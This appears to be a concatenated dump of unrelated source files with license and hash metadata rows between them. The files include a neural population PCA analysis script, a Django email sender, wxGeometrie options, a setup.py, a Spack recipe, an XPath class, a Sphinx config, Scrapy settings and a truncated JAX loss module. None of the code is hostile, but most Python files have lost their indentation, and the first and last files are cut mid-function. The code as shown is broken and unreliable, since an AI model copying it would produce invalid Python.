hpc_channel = generalinfo['channelStructure'][0][0][1][0][0][0][0] - 1
spikes,shank = loadSpikeData(data_directory+session+'/Analysis/SpikeData.mat', shankStructure['thalamus'])
wake_ep = loadEpoch(data_directory+session, 'wake')
sleep_ep = loadEpoch(data_directory+session, 'sleep')
sws_ep = loadEpoch(data_directory+session, 'sws')
rem_ep = loadEpoch(data_directory+session, 'rem')
sleep_ep = sleep_ep.merge_close_intervals(threshold=1.e3)
sws_ep = sleep_ep.intersect(sws_ep)
rem_ep = sleep_ep.intersect(rem_ep)
speed = loadSpeed(data_directory+session+'/Analysis/linspeed.mat').restrict(wake_ep)
speed_ep = nts.IntervalSet(speed[speed>2.5].index.values[0:-1], speed[speed>2.5].index.values[1:]).drop_long_intervals(26000).merge_close_intervals(50000)
wake_ep = wake_ep.intersect(speed_ep).drop_short_intervals(3000000)
n_channel,fs, shank_to_channel = loadXML(data_directory+session+"/"+session.split("/")[1]+'.xml')
rip_ep,rip_tsd = loadRipples(data_directory+session)
hd_info = scipy.io.loadmat(data_directory+session+'/Analysis/HDCells.mat')['hdCellStats'][:,-1]
hd_info_neuron = np.array([hd_info[n] for n in spikes.keys()])
all_neurons = np.array(list(spikes.keys()))
mod_neurons = np.array([int(n.split("_")[1]) for n in neurons_index if session.split("/")[1] in n])
if len(sleep_ep) > 1:
store = pd.HDFStore("/mnt/DataGuillaume/population_activity_25ms/"+session.split("/")[1]+".h5")
# all_pop = store['allwake']
pre_pop = store['presleep']
pos_pop = store['postsleep']
store.close()
store = pd.HDFStore("/mnt/DataGuillaume/population_activity_100ms/"+session.split("/")[1]+".h5")
all_pop = store['allwake']
# pre_pop = store['presleep']
# pos_pop = store['postsleep']
store.close()
def compute_eigen(popwak):
popwak = popwak - popwak.mean(0)
popwak = popwak / (popwak.std(0)+1e-8)
from sklearn.decomposition import PCA
pca = PCA(n_components = popwak.shape[1])
xy = pca.fit_transform(popwak.values)
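        # Keep only components whose eigenvalue exceeds the Marchenko-Pastur
        # upper bound (1 + sqrt(n_neurons / n_bins))**2 expected for a random
        # correlation matrix, i.e. the "signal" principal components.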
pc = pca.explained_variance_ > (1 + np.sqrt(1/(popwak.shape[0]/popwak.shape[1])))**2.0
eigen = pca.components_[pc]
lambdaa = pca.explained_variance_[pc]
return eigen, lambdaa
def compute_score(ep_pop, eigen, lambdaa, thr):
ep_pop = ep_pop - ep_pop.mean(0)
ep_pop = ep_pop / (ep_pop.std(0)+1e-8)
a = ep_pop.values
score = np.zeros(len(ep_pop))
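        # Reactivation strength per time bin: the squared projection onto each
        # significant component minus its diagonal terms, so that a single very
        # active neuron cannot drive the score on its own.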
for i in range(len(eigen)):
if lambdaa[i] >= thr:
score += (np.dot(a, eigen[i])**2.0 - np.dot(a**2.0, eigen[i]**2.0))
score = nts.Tsd(t = ep_pop.index.values, d = score)
return score
def compute_rip_score(tsd, score, bins):
times = np.floor(((bins[0:-1] + (bins[1] - bins[0])/2)/1000)).astype('int')
rip_score = pd.DataFrame(index = times, columns = [])
for r,i in zip(tsd.index.values,range(len(tsd))):
xbins = (bins + r).astype('int')
y = score.groupby(pd.cut(score.index.values, bins=xbins, labels = times)).mean()
if ~y.isnull().any():
rip_score[r] = y
return rip_score
def get_xmin(ep, minutes):
duree = (ep['end'] - ep['start'])/1000/1000/60
tmp = ep.iloc[np.where(np.ceil(duree.cumsum()) <= minutes + 1)[0]]
return nts.IntervalSet(tmp['start'], tmp['end'])
pre_ep = nts.IntervalSet(sleep_ep['start'][0], sleep_ep['end'][0])
post_ep = nts.IntervalSet(sleep_ep['start'][1], sleep_ep['end'][1])
pre_sws_ep = sws_ep.intersect(pre_ep)
pos_sws_ep = sws_ep.intersect(post_ep)
pre_sws_ep = get_xmin(pre_sws_ep.iloc[::-1], 30)
pos_sws_ep = get_xmin(pos_sws_ep, 30)
if pre_sws_ep.tot_length('s')/60 > 5.0 and pos_sws_ep.tot_length('s')/60 > 5.0:
for hd in range(3):
if hd == 0 or hd == 2:
index = np.where(hd_info_neuron == 0)[0]
elif hd == 1:
index = np.where(hd_info_neuron == 1)[0]
if hd == 0:
index = np.intersect1d(index, mod_neurons)
elif hd == 2:
index = np.intersect1d(index, np.setdiff1d(all_neurons, mod_neurons))
allpop = all_pop[index].copy()
prepop = nts.TsdFrame(pre_pop[index].copy())
pospop = nts.TsdFrame(pos_pop[index].copy())
# prepop25ms = nts.TsdFrame(pre_pop_25ms[index].copy())
# pospop25ms = nts.TsdFrame(pos_pop_25ms[index].copy())
if allpop.shape[1] and allpop.shape[1] > 5:
eigen,lambdaa = compute_eigen(allpop)
seuil = 1.2
if np.sum(lambdaa > seuil):
pre_score = compute_score(prepop, eigen, lambdaa, seuil)
pos_score = compute_score(pospop, eigen, lambdaa, seuil)
prerip_score = compute_rip_score(rip_tsd.restrict(pre_sws_ep), pre_score, bins1)
posrip_score = compute_rip_score(rip_tsd.restrict(pos_sws_ep), pos_score, bins1)
# pre_score_25ms = compute_score(prepop25ms, eigen)
# pos_score_25ms = compute_score(pospop25ms, eigen)
# prerip25ms_score = compute_rip_score(rip_tsd.restrict(pre_ep), pre_score_25ms, bins2)
# posrip25ms_score = compute_rip_score(rip_tsd.restrict(post_ep), pos_score_25ms, bins2)
# prerip25ms_score = prerip25ms_score - prerip25ms_score.mean(0)
# posrip25ms_score = posrip25ms_score - posrip25ms_score.mean(0)
# prerip25ms_score = prerip25ms_score / prerip25ms_score.std(0)
# posrip25ms_score = posrip25ms_score / posrip25ms_score.std(0)
# prerip25ms_score = prerip25ms_score.loc[-500:500]
# posrip25ms_score = posrip25ms_score.loc[-500:500]
# sys.exit()
# tmp = pd.concat([pd.DataFrame(prerip25ms_score.idxmax().values, columns = ['pre']),pd.DataFrame(posrip25ms_score.idxmax().values, columns = ['pos'])],axis = 1)
# tmp = pd.DataFrame(data = [[prerip25ms_score.mean(1).idxmax(), posrip25ms_score.mean(1).idxmax()]], columns = ['pre', 'pos'])
# tsmax[hd] = tsmax[hd].append(tmp, ignore_index = True)
premeanscore[hd]['rip'][session] = prerip_score.mean(1)
posmeanscore[hd]['rip'][session] = posrip_score.mean(1)
# if len(rem_ep.intersect(pre_ep)) and len(rem_ep.intersect(post_ep)):
# premeanscore[hd]['rem'].loc[session,'mean'] = pre_score.restrict(rem_ep.intersect(pre_ep)).mean()
# posmeanscore[hd]['rem'].loc[session,'mean'] = pos_score.restrict(rem_ep.intersect(post_ep)).mean()
# premeanscore[hd]['rem'].loc[session,'std'] = pre_score.restrict(rem_ep.intersect(pre_ep)).std()
# posmeanscore[hd]['rem'].loc[session,'std'] = pos_score.restrict(rem_ep.intersect(post_ep)).std()
return [premeanscore, posmeanscore, tsmax]
# sys.exit()
a = dview.map_sync(compute_pop_pca, datasets)
prescore = {i:pd.DataFrame(index = times) for i in range(3)}
posscore = {i:pd.DataFrame(index = times) for i in range(3)}
for i in range(len(a)):
for j in range(3):
if len(a[i][0][j]['rip'].columns):
s = a[i][0][j]['rip'].columns[0]
prescore[j][s] = a[i][0][j]['rip']
posscore[j][s] = a[i][1][j]['rip']
# prescore = premeanscore
# posscore = posmeanscore
from pylab import *
titles = ['non hd mod', 'hd', 'non hd non mod']
figure()
for i in range(3):
subplot(1,3,i+1)
times = prescore[i].index.values
# for s in premeanscore[i]['rip'].index.values:
# plot(times, premeanscore[i]['rip'].loc[s].values, linewidth = 0.3, color = 'blue')
# plot(times, posmeanscore[i]['rip'].loc[s].values, linewidth = 0.3, color = 'red')
plot(times, gaussFilt(prescore[i].mean(1).values, (1,)), label = 'pre', color = 'blue', linewidth = 2)
plot(times, gaussFilt(posscore[i].mean(1).values, (1,)), label = 'post', color = 'red', linewidth = 2)
legend()
title(titles[i])
show()
sys.exit()
#########################################
# search for peak in 25 ms array
########################################
tsmax = {i:pd.DataFrame(columns = ['pre', 'pos']) for i in range(2)}
for i in range(len(a)):
for hd in range(2):
tsmax[hd] = tsmax[hd].append(a[i][2][hd], ignore_index = True)
from pylab import *
plot(tsmax[0]['pos'], np.ones(len(tsmax[0]['pos'])), 'o')
plot(tsmax[0]['pos'].mean(), [1], '|', markersize = 10)
plot(tsmax[1]['pos'], np.zeros(len(tsmax[1]['pos'])), 'o')
plot(tsmax[1]['pos'].mean(), [0], '|', markersize = 10)
sys.exit()
#########################################
# SAVING
########################################
store = pd.HDFStore("../figures/figures_articles/figure3/pca_analysis_3.h5")
for i,j in zip(range(3),('nohd_mod', 'hd', 'nohd_nomod')):
store.put(j+'pre_rip', prescore[i])
store.put(j+'pos_rip', posscore[i])
store.close()
# a = dview.map_sync(compute_population_correlation, datasets[0:15])
# for i in range(len(a)):
# if type(a[i]) is dict:
# s = list(a[i].keys())[0]
# premeanscore.loc[s] = a[i][s]['pre']
# posmeanscore.loc[s] = a[i][s]['pos']
from pylab import *
titles = ['non hd', 'hd']
figure()
for i in range(2):
subplot(1,3,i+1)
times = premeanscore[i]['rip'].columns.values
# for s in premeanscore[i]['rip'].index.values:
# plot(times, premeanscore[i]['rip'].loc[s].values, linewidth = 0.3, color = 'blue')
# plot(times, posmeanscore[i]['rip'].loc[s].values, linewidth = 0.3, color = 'red')
plot(times, gaussFilt(premeanscore[i]['rip'].mean(0).values, (1,)), label = 'pre', color = 'blue', linewidth = 2)
plot(times, gaussFilt(posmeanscore[i]['rip'].mean(0).values, (1,)),label = 'post', color = 'red', linewidth = 2)
legend()
title(titles[i])
subplot(1,3,3)
bar([1,2], [premeanscore[0]['rem'].mean(0)['mean'], premeanscore[1]['rem'].mean(0)['mean']])
bar([3,4], [posmeanscore[0]['rem'].mean(0)['mean'], posmeanscore[1]['rem'].mean(0)['mean']])
xticks([1,2], ['non hd', 'hd'])
xticks([3,4], ['non hd', 'hd'])
show()
figure()
subplot(121)
times = premeanscore[0]['rip'].columns.values
for s in premeanscore[0]['rip'].index.values:
print(s)
plot(times, premeanscore[0]['rip'].loc[s].values, linewidth = 1, color = 'blue')
plot(premeanscore[0]['rip'].mean(0))
subplot(122)
for s in posmeanscore[0]['rip'].index.values:
plot(times, posmeanscore[0]['rip'].loc[s].values, linewidth = 1, color = 'red')
plot(posmeanscore[0]['rip'].mean(0))
show()
|
gpl-3.0
| -4,166,674,322,942,041,600 | 47.621538 | 185 | 0.55069 | false |
Tecktron/quickmailer
|
quickmail.py
|
1
|
3408
|
import argparse
import os
import re
import sys
if __name__ == "__main__":
if sys.version_info < (3, 0):
print("This script requires version 3+ of python. Please try running it with command 'python3' instead")
exit(8)
parser = argparse.ArgumentParser(
description="Quick Mailer"
)
parser.add_argument("-m", "--message", dest="msg", type=str, required=True,
help="The plain text message or filename of a message to send")
parser.add_argument("-t", "--to", dest="to", nargs="+", metavar="[email protected]", type=str,
help="Email address to recieve the message", required=True)
parser.add_argument("-f", "--from", dest="sender", type=str, required=False,
help="The from Email, if not provided, the settings will be used. NOTE: A specific address may "
"be required by your SMTP server")
parser.add_argument("-s", "--subject", dest="subject", required=True, type=str, help="The subject line")
parser.add_argument("-w", "--html", dest="html", action="store_true", required=False,
help="If using a file for m and file is html set this flag to use html email")
parser.add_argument("-a", "--attach", dest="attach", metavar="/path/to/file.txt", nargs="*", required=False,
help="files to attach (use full path)", default=[])
args = parser.parse_args()
# Here we inject the settings and load django
if not os.environ.get("DJANGO_SETTINGS_MODULE", False):
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "base.settings")
try:
import django
from django.conf import settings
except ImportError:
django = None
settings = None
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
django.setup()
# don't import Django things until after setup or errors abound
from django.core.mail import EmailMessage, EmailMultiAlternatives
from django.utils.html import strip_tags
msg = ""
is_file = False
if os.path.isfile(args.msg) is False:
msg = "{}".format(args.msg)
else:
try:
msg = open(args.msg).read()
except OSError as e:
print("Could not read msg file, exception said: {}".format(e))
exit(4)
sender = args.sender
if not sender:
sender = settings.DEFAULT_FROM_EMAIL
if args.html:
# quick and dirty, create a plain text version.
# replace breaks and paragraphs with newlines
plain = re.sub("<br\s*?>", "\n", msg)
plain = re.sub("</p>", "\n\n", plain)
# strip the rest of the tags.
plain = strip_tags(plain)
email = EmailMultiAlternatives(args.subject, plain, sender, args.to)
email.attach_alternative(msg, "text/html")
else:
email = EmailMessage(args.subject, msg, sender, args.to)
if len(args.attach):
for attachment in args.attach:
if os.path.isfile(attachment):
email.attach_file(attachment)
sent = email.send()
if sent:
print("Email sent successfully")
else:
print("There was an issue sending the message")
|
mit
| -8,947,849,462,155,596,000 | 39.094118 | 120 | 0.60446 | false |
wxgeo/geophar
|
wxgeometrie/param/options.py
|
1
|
4911
|
# -*- coding: utf-8 -*-
# WxGeometrie
# Dynamic geometry, graph plotter, and more for french mathematic teachers.
# Copyright (C) 2005-2013 Nicolas Pourcelot
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
######################################
# bool -> CheckBox
# file -> sélectionner un répertoire
# str -> TextCtrl
# (min, max) -> SpinCtrl
# [bool] -> CheckListBox
# ['item1', 'blabla2', ...] -> Choice
from copy import deepcopy
from io import IOBase as file
from .modules import modules as _modules, descriptions_modules
class Rubrique(list):
def __init__(self, titre):
self.titre = titre
list.__init__(self)
def add(self, value):
list.append(self, value)
return value
class Options(Rubrique):
pass
class Theme(Rubrique):
pass
class Section(Rubrique):
pass
class Parametre(object):
def __init__(self, _texte, _get = (lambda x:x), _set = (lambda x:x), **kw):
assert len(kw) == 1
self.nom, self.type = kw.popitem()
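        # A name of the form 'prefix__key' addresses entry 'key' of the dict
        # 'param.prefix'; a plain name addresses the attribute 'param.name'
        # directly (see _get_val/_set_val below).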
if '__' in self.nom:
self.prefixe, self.key = self.nom.split('__', 1)
else:
self.prefixe = self.nom
self.key = None
self._get = _get
self._set = _set
self.defaut = deepcopy(self.valeur)
self.texte = _texte
def _get_val(self):
from .. import param
if self.key is None:
val = getattr(param, self.nom)
else:
val = getattr(param, self.prefixe)[self.key]
return self._get(val)
def _set_val(self, val):
from .. import param
val = self._set(val)
if self.key is None:
setattr(param, self.nom, val)
else:
getattr(param, self.prefixe)[self.key] = val
valeur = property(_get_val, _set_val)
P = Parametre
options = Options('Préférences')
## GENERAL
general = options.add(Theme('Général'))
general.add(P('Utilisateur', utilisateur = str))
general.add(P("Nombre maximal d'annulations", nbr_annulations = (0, 1000)))
ouverture = general.add(Section('Au démarrage'))
ouverture.add(P('Restaurer automatiquement la session précédente.', auto_restaurer_session=bool))
fermeture = general.add(Section('À la fermeture'))
fermeture.add(P('Demander confirmation avant de quitter.', confirmer_quitter = bool))
fermeture.add(P('Sauvegarder les préférences.', sauver_preferences = bool))
auto = general.add(Section('Sauvegarde automatique'))
auto.add(P('Intervalle entre deux sauvegardes', sauvegarde_automatique = (0, 10000)))
auto.add('Temps (en dizaine de s) entre deux sauvegardes automatiques.')
auto.add('La valeur 0 désactive la sauvegarde automatique.')
## MODULES
modules = options.add(Theme('Modules'))
liste = modules.add(Section('Activer les modules suivants'))
for nom in _modules:
d = {'modules_actifs__' + nom: bool}
liste.add(P(descriptions_modules[nom]['titre'], **d))
modules.add('Nota: les modules non activés par défaut peuvent être non documentés\net/ou encore expérimentaux.')
#modules.add(P(u'Activer les modules suivants', modules_actifs = dict))
## FORMAT
format = options.add(Theme('Format'))
format.add(P('Décimales affichées', decimales=(0, 10)))
format.add(P('Unité d\'angle',
_get = (lambda k: {'d': 'degré', 'r': 'radian', 'g':' grade'}[k]),
_set = (lambda s: s[0]),
unite_angle = ['degré', 'radian', 'grade']
))
format.add(P('Séparateur décimal',
_get = (lambda k: {',': 'virgule', '.': 'point'}[k]),
_set = (lambda k: {'virgule': ',', 'point': '.'}[k]),
separateur_decimal = ['virgule', 'point']
))
## AVANCÉ
avance = options.add(Theme('Avancé'))
export = avance.add(Section("Export"))
export.add(P("Résolution des images PNG", dpi_export=(10, 10000)))
sauvegarde = avance.add(Section("Sauvegarde"))
sauvegarde.add(P("Compresser les fichiers .geo par défaut.", compresser_geo=bool))
empl_pref = avance.add(Section("Répertoires d'enregistrement"))
empl_pref.add(P("Préférences", emplacements__preferences=open))
empl_pref.add(P("Session", emplacements__session=open))
empl_pref.add(P("Rapports d'erreur", emplacements__log=open))
|
gpl-2.0
| 6,670,033,521,094,492,000 | 31.744966 | 112 | 0.64296 | false |
mikeboers/C3Linearize
|
setup.py
|
1
|
1166
|
from distutils.core import setup
setup(
name='C3Linearize',
version='0.1.0',
description='Python implementation of the C3 linearization algorithm.',
url='http://github.com/mikeboers/C3Linearize',
py_modules=['c3linearize'],
author='Mike Boers',
author_email='[email protected]',
license='BSD-3',
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Natural Language :: English',
'Operating System :: OS Independent',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.3',
'Programming Language :: Python :: 2.4',
'Programming Language :: Python :: 2.5',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.0',
'Programming Language :: Python :: 3.1',
'Programming Language :: Python :: 3.2',
'Topic :: Software Development :: Libraries :: Python Modules',
],
)
|
bsd-3-clause
| -6,231,679,453,400,698,000 | 34.333333 | 75 | 0.59777 | false |
skosukhin/spack
|
var/spack/repos/builtin/packages/dia/package.py
|
1
|
2553
|
##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, [email protected], All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class Dia(Package):
"""Dia is a program for drawing structured diagrams."""
homepage = 'https://wiki.gnome.org/Apps/Dia'
url = 'https://ftp.gnome.org/pub/gnome/sources/dia/0.97/dia-0.97.3.tar.xz'
version('0.97.3', '0e744a0f6a6c4cb6a089e4d955392c3c')
depends_on('intltool', type='build')
depends_on('[email protected]:+X')
depends_on('libxslt')
depends_on('python')
depends_on('swig')
depends_on('libsm')
depends_on('libuuid')
depends_on('libxinerama')
depends_on('libxrender')
depends_on('libxml2')
depends_on('freetype')
# TODO: Optional dependencies, not yet supported by Spack
# depends_on('libart')
# depends_on('py-pygtk', type=('build', 'run'))
def url_for_version(self, version):
"""Handle Dia's version-based custom URLs."""
return 'https://ftp.gnome.org/pub/gnome/sources/dia/%s/dia-%s.tar.xz' % (version.up_to(2), version)
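    # Editor's note (illustrative, not part of the original Spack recipe):
    # url_for_version() above keeps only the major.minor component of the
    # version for the directory, so Version('0.97.3') resolves to
    # https://ftp.gnome.org/pub/gnome/sources/dia/0.97/dia-0.97.3.tar.xz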
def install(self, spec, prefix):
# configure, build, install:
options = ['--prefix=%s' % prefix,
'--with-cairo',
'--with-xslt-prefix=%s' % spec['libxslt'].prefix,
'--with-python',
'--with-swig']
configure(*options)
make()
make('install')
|
lgpl-2.1
| 524,486,476,142,904,800 | 37.681818 | 107 | 0.62358 | false |
Pikecillo/genna
|
external/4Suite-XML-1.0.2/Ft/Xml/XPath/ParsedRelativeLocationPath.py
|
1
|
1412
|
########################################################################
# $Header: /var/local/cvsroot/4Suite/Ft/Xml/XPath/ParsedRelativeLocationPath.py,v 1.4 2005/02/09 11:10:54 mbrown Exp $
"""
A parsed token that represents a relative location path in the parsed result tree.
Copyright 2005 Fourthought, Inc. (USA).
Detailed license and copyright information: http://4suite.org/COPYRIGHT
Project home, documentation, distributions: http://4suite.org/
"""
class ParsedRelativeLocationPath:
def __init__(self, left, right):
self._left = left
self._right = right
return
def evaluate(self, context):
nodeset = self._left.select(context)
state = context.copy()
result = []
size = len(nodeset)
for pos in xrange(size):
context.node, context.position, context.size = \
nodeset[pos], pos + 1, size
result.extend(self._right.select(context))
context.set(state)
return result
select = evaluate
def pprint(self, indent=''):
print indent + str(self)
self._left.pprint(indent + ' ')
self._right.pprint(indent + ' ')
def __str__(self):
return '<RelativeLocationPath at %x: %s>' % (
id(self),
repr(self),
)
def __repr__(self):
return repr(self._left) + '/' + repr(self._right)
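# Editor's note (illustrative comment, not part of the original 4Suite module):
# for an expression such as 'chapter/title' the parser builds
# ParsedRelativeLocationPath(left=<step 'chapter'>, right=<step 'title'>).
# evaluate() selects the 'chapter' nodes with the left step, then runs the
# right step once per selected node (updating context.node, .position and
# .size) and concatenates the results, which is the XPath 1.0 meaning of '/'.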
|
gpl-2.0
| -7,323,416,474,104,998,000 | 30.377778 | 118 | 0.55949 | false |
watsonpy/watson-auth
|
docs/conf.py
|
1
|
2537
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Watson - Auth documentation build configuration file, created by
# sphinx-quickstart on Fri Jan 17 14:49:48 2014.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import os
import sys
sys.path.insert(0, os.path.abspath('..'))
import watson.auth
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.viewcode',
'sphinx.ext.intersphinx',
'sphinxcontrib.napoleon'
]
templates_path = ['_templates']
source_suffix = '.rst'
master_doc = 'index'
project = 'Watson - Auth'
copyright = '2014, Simon Coulton'
version = watson.auth.__version__
release = version
exclude_patterns = ['_build']
pygments_style = 'sphinx'
# -- Options for HTML output ----------------------------------------------
on_rtd = os.environ.get('READTHEDOCS', None) == 'True'
if not on_rtd: # only import and set the theme if we're building docs locally
import sphinx_rtd_theme
html_theme = 'sphinx_rtd_theme'
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
html_static_path = ['_static']
htmlhelp_basename = 'Watson-Authdoc'
# html_sidebars = {}
html_show_sourcelink = False
html_show_sphinx = False
# -- Options for manual page output ---------------------------------------
man_pages = [
('index', 'watson-auth', 'Watson - Auth Documentation',
['Simon Coulton'], 1)
]
# -- Options for Texinfo output -------------------------------------------
texinfo_documents = [
('index', 'Watson-Auth', 'Watson - Auth Documentation',
'Simon Coulton', 'Watson-Auth', 'Authorization and authentication library for Watson.',
'Miscellaneous'),
]
texinfo_appendices = []
# Intersphinx Mapping
# Autodoc
def skip(app, what, name, obj, skip, options):
if name == '__init__':
return False
elif name in ('__module__', '__doc__', '__abstractmethods__'):
return True
return skip
def setup(app):
app.connect('autodoc-skip-member', skip)
|
bsd-3-clause
| 2,506,785,883,207,107,000 | 24.626263 | 92 | 0.637761 | false |
Clebeuf/MAPE-K-Python
|
MAPE-K/ManagedScraper/ManagedScraper/settings.py
|
1
|
3357
|
# -*- coding: utf-8 -*-
# Scrapy settings for ManagedScraper project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
# http://doc.scrapy.org/en/latest/topics/settings.html
# http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
# http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
BOT_NAME = 'ManagedScraper'
SPIDER_MODULES = ['ManagedScraper.spiders']
NEWSPIDER_MODULE = 'ManagedScraper.spiders'
#ITEM_PIPELINES = {'ManagedScraper.pipelines.MetadataFilterPipeline': 100}
DOWNLOAD_DELAY = 1
#RANDOM_DOWNLOAD_DELAY = TRUE
#CONCURRENT_REQUESTS = 5
#CONCURRENT_REQUESTS_PER_IP = 1
# Crawl responsibly by identifying yourself (and your website) on the user-agent
USER_AGENT = 'ResearchSurveyCrawler (SAS)'
# Crawl responsibly by identifying yourself (and your website) on the user-agent
#USER_AGENT = 'ManagedScraper (+http://www.yourdomain.com)'
# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS=32
# Configure a delay for requests for the same website (default: 0)
# See http://scrapy.readthedocs.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
#DOWNLOAD_DELAY=3
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN=16
#CONCURRENT_REQUESTS_PER_IP=16
# Disable cookies (enabled by default)
#COOKIES_ENABLED=False
# Disable Telnet Console (enabled by default)
#TELNETCONSOLE_ENABLED=False
# Override the default request headers:
#DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
#}
# Enable or disable spider middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
#SPIDER_MIDDLEWARES = {
# 'ManagedScraper.middlewares.MyCustomSpiderMiddleware': 543,
#}
# Enable or disable downloader middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
#DOWNLOADER_MIDDLEWARES = {
# 'ManagedScraper.middlewares.MyCustomDownloaderMiddleware': 543,
#}
# Enable or disable extensions
# See http://scrapy.readthedocs.org/en/latest/topics/extensions.html
#EXTENSIONS = {
# 'scrapy.telnet.TelnetConsole': None,
#}
# Configure item pipelines
# See http://scrapy.readthedocs.org/en/latest/topics/item-pipeline.html
#ITEM_PIPELINES = {
# 'ManagedScraper.pipelines.SomePipeline': 300,
#}
# Enable and configure the AutoThrottle extension (disabled by default)
# See http://doc.scrapy.org/en/latest/topics/autothrottle.html
# NOTE: AutoThrottle will honour the standard settings for concurrency and delay
#AUTOTHROTTLE_ENABLED=True
# The initial download delay
#AUTOTHROTTLE_START_DELAY=5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY=60
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG=False
# Enable and configure HTTP caching (disabled by default)
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED=True
#HTTPCACHE_EXPIRATION_SECS=0
#HTTPCACHE_DIR='httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES=[]
#HTTPCACHE_STORAGE='scrapy.extensions.httpcache.FilesystemCacheStorage'
|
mit
| 6,122,486,349,990,847,000 | 35.096774 | 109 | 0.777778 | false |
deepmind/deepmind-research
|
ogb_lsc/mag/losses.py
|
1
|
6654
|
# Copyright 2021 DeepMind Technologies Limited.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Losses and related utilities."""
from typing import Mapping, Tuple, Sequence, NamedTuple, Dict, Optional
import jax
import jax.numpy as jnp
import jraph
import numpy as np
# pylint: disable=g-bad-import-order
import datasets
LogsDict = Mapping[str, jnp.ndarray]
class Predictions(NamedTuple):
node_indices: np.ndarray
labels: np.ndarray
predictions: np.ndarray
logits: np.ndarray
def node_classification_loss(
logits: jnp.ndarray,
batch: datasets.Batch,
extra_stats: bool = False,
) -> Tuple[jnp.ndarray, LogsDict]:
"""Gets node-wise classification loss and statistics."""
log_probs = jax.nn.log_softmax(logits)
loss = -jnp.sum(log_probs * batch.node_labels, axis=-1)
num_valid = jnp.sum(batch.label_mask)
labels = jnp.argmax(batch.node_labels, axis=-1)
is_correct = (jnp.argmax(log_probs, axis=-1) == labels)
num_correct = jnp.sum(is_correct * batch.label_mask)
loss = jnp.sum(loss * batch.label_mask) / (num_valid + 1e-8)
accuracy = num_correct / (num_valid + 1e-8)
entropy = -jnp.mean(jnp.sum(jax.nn.softmax(logits) * log_probs, axis=-1))
stats = {
'classification_loss': loss,
'prediction_entropy': entropy,
'accuracy': accuracy,
'num_valid': num_valid,
'num_correct': num_correct,
}
if extra_stats:
for k in range(1, 6):
stats[f'top_{k}_correct'] = topk_correct(logits, labels,
batch.label_mask, k)
return loss, stats
def get_predictions_labels_and_logits(
logits: jnp.ndarray,
batch: datasets.Batch,
) -> Tuple[jnp.ndarray, jnp.ndarray, jnp.ndarray, jnp.ndarray]:
"""Gets prediction labels and logits."""
mask = batch.label_mask > 0.
indices = batch.node_indices[mask]
logits = logits[mask]
predictions = jnp.argmax(logits, axis=-1)
labels = jnp.argmax(batch.node_labels[mask], axis=-1)
return indices, predictions, labels, logits
def topk_correct(
logits: jnp.ndarray,
labels: jnp.ndarray,
valid_mask: jnp.ndarray,
topk: int,
) -> jnp.ndarray:
"""Calculates top-k accuracy."""
pred_ranking = jnp.argsort(logits, axis=1)[:, ::-1]
pred_ranking = pred_ranking[:, :topk]
